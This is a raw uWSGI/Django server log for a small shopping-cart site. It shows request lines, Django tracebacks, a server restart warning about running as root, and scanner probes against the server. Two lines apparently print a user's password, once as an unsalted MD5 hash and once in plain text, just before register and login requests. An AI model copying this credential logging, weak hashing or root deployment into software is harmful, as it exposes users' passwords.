app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 83/83] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:28:20 2019] GET /axf/changecartall/?isall=true => generated 12554 bytes in 21 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 84/84] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:28:20 2019] GET /axf/changecartall/?isall=false => generated 12558 bytes in 20 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 85/85] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:28:20 2019] GET /axf/changecartall/?isall=true => generated 12554 bytes in 20 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 86/86] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:28:20 2019] GET /axf/changecartall/?isall=false => generated 12558 bytes in 26 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 87/87] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:28:21 2019] GET /axf/changecartall/?isall=true => generated 12554 bytes in 20 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 88/88] 113.87.160.176 () {46 vars in 952 bytes} [Wed Mar 13 07:28:22 2019] GET /axf/cart/ => generated 942 bytes in 6 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 89/89] 113.87.160.176 () {46 vars in 952 bytes} [Wed Mar 13 07:28:24 2019] GET /axf/cart/ => generated 942 bytes in 6 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 90/90] 113.88.14.120 () {44 vars in 810 bytes} [Wed Mar 13 07:28:26 2019] GET /axf/checkemail/?email=123%40qq.com => generated 55 bytes in 3 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 91/91] 113.88.14.120 () {44 vars in 818 bytes} [Wed Mar 13 07:28:35 2019] GET /axf/checkemail/?email=7758521%40qq.com => generated 60 bytes in 3 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 92/92] 113.87.160.176 () {42 vars in 868 bytes} [Wed Mar 13 07:28:36 2019] GET /axf/cart/ => generated 942 bytes in 7 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
e10adc3949ba59abbe56e057f20f883e
[pid: 26024|app: 0|req: 93/93] 113.88.14.120 () {52 vars in 1031 bytes} [Wed Mar 13 07:28:44 2019] POST /axf/register/ => generated 0 bytes in 11 msecs (HTTP/1.1 302) 6 headers in 277 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 94/94] 113.88.14.120 () {46 vars in 914 bytes} [Wed Mar 13 07:28:44 2019] GET /axf/mine/ => generated 5067 bytes in 10 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 95/95] 113.87.160.176 () {44 vars in 917 bytes} [Wed Mar 13 07:28:46 2019] GET /axf/login/ => generated 1906 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 96/96] 113.88.14.120 () {44 vars in 879 bytes} [Wed Mar 13 07:28:54 2019] GET /axf/cart/ => generated 2387 bytes in 11 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 97/97] 113.88.14.120 () {44 vars in 879 bytes} [Wed Mar 13 07:28:56 2019] GET /axf/cart/ => generated 2387 bytes in 11 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 98/98] 113.88.14.120 () {44 vars in 883 bytes} [Wed Mar 13 07:28:58 2019] GET /axf/market/ => generated 10768 bytes in 18 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 99/99] 113.88.14.120 () {44 vars in 894 bytes} [Wed Mar 13 07:29:02 2019] GET /axf/market/ => generated 40672 bytes in 23 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 100/100] 113.88.14.120 () {44 vars in 834 bytes} [Wed Mar 13 07:29:04 2019] GET /axf/addcart/?goodsid=1019 => generated 73 bytes in 15 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 101/101] 113.88.14.120 () {44 vars in 834 bytes} [Wed Mar 13 07:29:05 2019] GET /axf/addcart/?goodsid=1019 => generated 73 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 102/102] 113.88.14.120 () {44 vars in 834 bytes} [Wed Mar 13 07:29:05 2019] GET /axf/addcart/?goodsid=1019 => generated 73 bytes in 15 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 103/103] 113.88.14.120 () {44 vars in 834 bytes} [Wed Mar 13 07:29:05 2019] GET /axf/addcart/?goodsid=1019 => generated 73 bytes in 13 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 104/104] 113.88.14.120 () {44 vars in 881 bytes} [Wed Mar 13 07:29:06 2019] GET /axf/cart/ => generated 3257 bytes in 14 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
123123
[pid: 26024|app: 0|req: 105/105] 113.87.160.176 () {48 vars in 1035 bytes} [Wed Mar 13 07:29:12 2019] POST /axf/login/ => generated 0 bytes in 12 msecs (HTTP/1.1 302) 6 headers in 277 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 106/106] 113.87.160.176 () {44 vars in 916 bytes} [Wed Mar 13 07:29:12 2019] GET /axf/mine/ => generated 5080 bytes in 9 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 107/107] 113.87.160.176 () {44 vars in 915 bytes} [Wed Mar 13 07:29:17 2019] GET /axf/cart/ => generated 5822 bytes in 23 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 108/108] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:29:21 2019] GET /axf/changecartall/?isall=false => generated 60 bytes in 20 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 109/109] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:29:21 2019] GET /axf/changecartall/?isall=true => generated 60 bytes in 24 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 110/110] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:29:22 2019] GET /axf/changecartall/?isall=false => generated 60 bytes in 20 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 111/111] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:29:23 2019] GET /axf/changecartall/?isall=true => generated 60 bytes in 30 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 112/112] 113.87.160.176 () {44 vars in 891 bytes} [Wed Mar 13 07:29:26 2019] GET /axf/changecartselect/?cartid=11 => generated 91 bytes in 7 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 113/113] 113.87.160.176 () {44 vars in 891 bytes} [Wed Mar 13 07:29:29 2019] GET /axf/changecartselect/?cartid=10 => generated 91 bytes in 7 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 114/114] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:29:31 2019] GET /axf/changecartall/?isall=false => generated 60 bytes in 21 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 115/115] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:29:32 2019] GET /axf/changecartall/?isall=true => generated 60 bytes in 27 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 116/116] 113.88.14.120 () {44 vars in 879 bytes} [Wed Mar 13 07:29:37 2019] GET /axf/mine/ => generated 5067 bytes in 10 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 117/117] 113.88.14.120 () {46 vars in 910 bytes} [Wed Mar 13 07:29:40 2019] GET /axf/mine/ => generated 5067 bytes in 10 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
Not Found: /
[pid: 26024|app: 0|req: 118/118] 47.101.204.90 () {34 vars in 461 bytes} [Wed Mar 13 07:30:33 2019] GET / => generated 2013 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 119/119] 113.88.14.120 () {44 vars in 820 bytes} [Wed Mar 13 07:33:15 2019] GET /axf/cart/ => generated 942 bytes in 3 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 120/120] 113.88.14.120 () {44 vars in 820 bytes} [Wed Mar 13 07:33:16 2019] GET /axf/cart/ => generated 942 bytes in 3 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 121/121] 113.88.14.120 () {44 vars in 820 bytes} [Wed Mar 13 07:33:18 2019] GET /axf/cart/ => generated 942 bytes in 4 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 122/122] 113.88.14.120 () {44 vars in 820 bytes} [Wed Mar 13 07:33:19 2019] GET /axf/cart/ => generated 942 bytes in 3 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 123/123] 113.88.14.120 () {44 vars in 820 bytes} [Wed Mar 13 07:33:19 2019] GET /axf/cart/ => generated 942 bytes in 3 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
Not Found: /
[pid: 26024|app: 0|req: 124/124] 185.112.28.133 () {32 vars in 446 bytes} [Wed Mar 13 08:04:50 2019] GET / => generated 2016 bytes in 5 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26024|app: 0|req: 125/125] 47.92.155.0 () {34 vars in 459 bytes} [Wed Mar 13 08:46:11 2019] GET / => generated 2013 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26024|app: 0|req: 126/126] 191.8.34.177 () {32 vars in 444 bytes} [Wed Mar 13 08:50:34 2019] GET / => generated 2016 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /forum.php
[pid: 26024|app: 0|req: 127/127] 66.249.79.239 () {38 vars in 679 bytes} [Wed Mar 13 08:51:51 2019] GET /forum.php?mod=forumdisplay&fid=47&filter=heat&orderby=heats => generated 2117 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26024|app: 0|req: 128/128] 47.101.204.96 () {34 vars in 462 bytes} [Wed Mar 13 08:54:41 2019] GET / => generated 2014 bytes in 5 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /forum.php
[pid: 26024|app: 0|req: 129/129] 66.249.79.239 () {38 vars in 673 bytes} [Wed Mar 13 09:01:56 2019] GET /forum.php?mod=forumdisplay&fid=38&filter=digest&digest=1 => generated 2114 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26024|app: 0|req: 130/130] 59.111.30.195 () {36 vars in 461 bytes} [Wed Mar 13 09:14:33 2019] GET / => generated 2008 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26024|app: 0|req: 131/131] 164.160.141.18 () {32 vars in 446 bytes} [Wed Mar 13 09:28:41 2019] GET / => generated 2016 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26024|app: 0|req: 132/132] 163.177.13.2 () {32 vars in 425 bytes} [Wed Mar 13 09:36:16 2019] HEAD / => generated 2011 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26024|app: 0|req: 133/133] 200.161.170.238 () {32 vars in 448 bytes} [Wed Mar 13 09:45:18 2019] GET / => generated 2016 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /robots.txt
[pid: 26024|app: 0|req: 134/134] 66.249.79.131 () {36 vars in 507 bytes} [Wed Mar 13 09:46:21 2019] GET /robots.txt => generated 2061 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /forum.php
[pid: 26024|app: 0|req: 135/135] 66.249.79.131 () {38 vars in 676 bytes} [Wed Mar 13 09:46:22 2019] GET /forum.php?mod=forumdisplay&fid=47&filter=digest&digest=1 => generated 2117 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /template/qu_zuk/img/js/jquery.SuperSlide.js
[pid: 26024|app: 0|req: 136/136] 66.249.79.159 () {44 vars in 1052 bytes} [Wed Mar 13 09:46:30 2019] GET /template/qu_zuk/img/js/jquery.SuperSlide.js => generated 2160 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /data/cache/style_9_common.css
[pid: 26024|app: 0|req: 137/137] 66.249.79.129 () {44 vars in 1046 bytes} [Wed Mar 13 09:46:31 2019] GET /data/cache/style_9_common.css?A0T => generated 2122 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /source/plugin/qu_forumimglist/images/lightbox.js
[pid: 26024|app: 0|req: 138/138] 66.249.79.129 () {44 vars in 1062 bytes} [Wed Mar 13 09:46:31 2019] GET /source/plugin/qu_forumimglist/images/lightbox.js => generated 2175 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /source/plugin/qu_forumimglist/images/lightbox.css
[pid: 26024|app: 0|req: 139/139] 66.249.79.129 () {44 vars in 1079 bytes} [Wed Mar 13 09:46:32 2019] GET /source/plugin/qu_forumimglist/images/lightbox.css => generated 2178 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /template/qu_zuk/img/js/jquery.forum.js
[pid: 26024|app: 0|req: 140/140] 66.249.79.129 () {44 vars in 1042 bytes} [Wed Mar 13 09:46:32 2019] GET /template/qu_zuk/img/js/jquery.forum.js => generated 2145 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /home.php
[pid: 26024|app: 0|req: 141/141] 66.249.79.159 () {44 vars in 1055 bytes} [Wed Mar 13 09:46:32 2019] GET /home.php?mod=misc&ac=sendmail&rand=1549268185 => generated 2100 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /data/cache/style_9_forum_forumdisplay.css
[pid: 26024|app: 0|req: 142/142] 66.249.79.159 () {44 vars in 1070 bytes} [Wed Mar 13 09:46:33 2019] GET /data/cache/style_9_forum_forumdisplay.css?A0T => generated 2158 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /template/qu_zuk/img/js/jquery.js
[pid: 26024|app: 0|req: 143/143] 66.249.79.159 () {44 vars in 1030 bytes} [Wed Mar 13 09:46:33 2019] GET /template/qu_zuk/img/js/jquery.js => generated 2127 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /source/plugin/qu_forumimglist/images/style.css
[pid: 26024|app: 0|req: 144/144] 66.249.79.159 () {44 vars in 1073 bytes} [Wed Mar 13 09:46:34 2019] GET /source/plugin/qu_forumimglist/images/style.css => generated 2169 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /source/plugin/qu_forumimglist/images/jquery-1.11.0.min.js
[pid: 26024|app: 0|req: 145/145] 66.249.79.159 () {44 vars in 1080 bytes} [Wed Mar 13 09:46:35 2019] GET /source/plugin/qu_forumimglist/images/jquery-1.11.0.min.js => generated 2202 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /echo.php
[pid: 26024|app: 0|req: 146/146] 139.162.88.63 () {32 vars in 401 bytes} [Wed Mar 13 09:49:38 2019] GET /echo.php?info=1234567890 => generated 2075 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26024|app: 0|req: 147/147] 187.151.206.11 () {28 vars in 283 bytes} [Wed Mar 13 10:05:57 2019] GET / => generated 2006 bytes in 3 msecs (HTTP/1.0 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26024|app: 0|req: 148/148] 47.92.121.206 () {34 vars in 461 bytes} [Wed Mar 13 10:44:20 2019] GET / => generated 2013 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
[pid: 26024|app: 0|req: 149/149] 216.245.197.254 () {26 vars in 285 bytes} [Wed Mar 13 11:13:28 2019] HEAD /robots.txt => generated 55186 bytes in 56 msecs (HTTP/1.0 400) 1 headers in 53 bytes (1 switches on core 0)
invalid request block size: 21573 (max 4096)...skip
invalid request block size: 21573 (max 4096)...skip
invalid request block size: 21573 (max 4096)...skip
invalid request block size: 21573 (max 4096)...skip
[pid: 26024|app: 0|req: 150/150] 113.88.14.120 () {42 vars in 806 bytes} [Wed Mar 13 11:46:58 2019] GET /axf/ => generated 22501 bytes in 23 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
Not Found: /favicon.ico
[pid: 26024|app: 0|req: 151/151] 113.87.160.176 () {42 vars in 782 bytes} [Wed Mar 13 11:46:59 2019] GET /favicon.ico => generated 2064 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Internal Server Error: /axf/mine/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 134, in mine
    return render(request,'mine/mine.html',context={'user':user})
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/shortcuts.py", line 30, in render
    content = loader.render_to_string(template_name, context, request, using=using)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/loader.py", line 68, in render_to_string
    return template.render(context, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/backends/django.py", line 66, in render
    return self.template.render(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/base.py", line 207, in render
    return self._render(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/base.py", line 199, in _render
    return self.nodelist.render(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/base.py", line 990, in render
    bit = node.render_annotated(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/base.py", line 957, in render_annotated
    return self.render(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/loader_tags.py", line 177, in render
    return compiled_parent._render(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/base.py", line 199, in _render
    return self.nodelist.render(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/base.py", line 990, in render
    bit = node.render_annotated(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/base.py", line 957, in render_annotated
    return self.render(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/loader_tags.py", line 72, in render
    result = block.nodelist.render(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/base.py", line 990, in render
    bit = node.render_annotated(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/base.py", line 957, in render_annotated
    return self.render(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/loader_tags.py", line 72, in render
    result = block.nodelist.render(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/base.py", line 990, in render
    bit = node.render_annotated(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/base.py", line 957, in render_annotated
    return self.render(context)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/template/defaulttags.py", line 458, in render
    url = reverse(view_name, args=args, kwargs=kwargs, current_app=current_app)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/urls/base.py", line 91, in reverse
    return force_text(iri_to_uri(resolver._reverse_with_prefix(view, prefix, *args, **kwargs)))
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/urls/resolvers.py", line 497, in _reverse_with_prefix
    raise NoReverseMatch(msg)
django.urls.exceptions.NoReverseMatch: Reverse for 'orderlist' not found. 'orderlist' is not a valid view function or pattern name.
[pid: 26024|app: 0|req: 152/152] 113.88.14.120 () {44 vars in 888 bytes} [Wed Mar 13 11:47:07 2019] GET /axf/mine/ => generated 164307 bytes in 125 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
*** Starting uWSGI 2.0.18 (64bit) on [Wed Mar 13 19:48:36 2019] ***
compiled with version: 5.4.0 20160609 on 13 March 2019 06:42:24
os: Linux-4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
nodename: iZwz9jf51n6nnlskuibatuZ
machine: x86_64
clock source: unix
detected number of CPU cores: 1
current working directory: /var/www/axf
writing pidfile to uwsgi.pid
detected binary path: /root/.virtualenv/axf/bin/uwsgi
!!! no internal routing support, rebuild with pcre support !!!
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
chdir() to /var/www/axf
*** WARNING: you are running uWSGI without its master process manager ***
your processes number limit is 1801
your memory page size is 4096 bytes
detected max file descriptor number: 65535
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 0.0.0.0:8030 fd 3
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
Python version: 3.5.2 (default, Nov 12 2018, 13:43:14)  [GCC 5.4.0 20160609]
Python main interpreter initialized at 0xed83f0
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 83344 bytes (81 KB) for 2 cores
*** Operational MODE: threaded ***
WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0xed83f0 pid: 26361 (default app)
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI worker 1 (and the only) (pid: 26361, cores: 2)
[pid: 26361|app: 0|req: 1/1] 113.88.14.120 () {44 vars in 888 bytes} [Wed Mar 13 11:48:57 2019] GET /axf/mine/ => generated 5076 bytes in 80 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 2/2] 113.87.160.176 () {44 vars in 894 bytes} [Wed Mar 13 11:49:04 2019] GET /axf/cart/ => generated 2414 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 3/3] 113.88.14.120 () {44 vars in 897 bytes} [Wed Mar 13 11:49:06 2019] GET /axf/market/ => generated 10768 bytes in 17 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 4/4] 113.88.14.120 () {44 vars in 888 bytes} [Wed Mar 13 11:49:08 2019] GET /axf/mine/ => generated 5076 bytes in 13 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 5/5] 113.88.14.120 () {44 vars in 897 bytes} [Wed Mar 13 11:49:10 2019] GET /axf/logout/ => generated 0 bytes in 9 msecs (HTTP/1.1 302) 5 headers in 217 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 6/6] 113.88.14.120 () {44 vars in 849 bytes} [Wed Mar 13 11:49:10 2019] GET /axf/mine/ => generated 5013 bytes in 6 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 7/7] 113.88.14.120 () {44 vars in 849 bytes} [Wed Mar 13 11:49:13 2019] GET /axf/cart/ => generated 942 bytes in 5 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 8/8] 113.88.14.120 () {44 vars in 851 bytes} [Wed Mar 13 11:49:15 2019] GET /axf/login/ => generated 1906 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 9/9] 113.87.160.176 () {44 vars in 851 bytes} [Wed Mar 13 11:49:17 2019] GET /axf/mine/ => generated 5013 bytes in 7 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
